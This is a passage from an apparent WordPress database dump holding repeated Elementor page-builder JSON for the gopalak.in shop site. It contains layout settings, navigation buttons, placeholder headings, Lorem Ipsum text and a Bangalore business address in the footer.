here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8254,1454,'_elementor_page_assets','a:0:{}'),(8257,1455,'_elementor_edit_mode','builder'),(8258,1455,'_elementor_template_type','wp-page'),(8259,1455,'_elementor_version','3.7.7'),(8260,1455,'_wp_page_template','elementor_canvas'),(8261,1455,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e8bbbae\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8262,1455,'_elementor_page_assets','a:0:{}'),(8264,1456,'_elementor_edit_mode','builder'),(8265,1456,'_elementor_template_type','wp-page'),(8266,1456,'_elementor_version','3.7.7'),(8267,1456,'_wp_page_template','elementor_canvas'),(8268,1456,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"224\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"-14\",\"right\":0,\"bottom\":\"-14\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9c7fcf\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 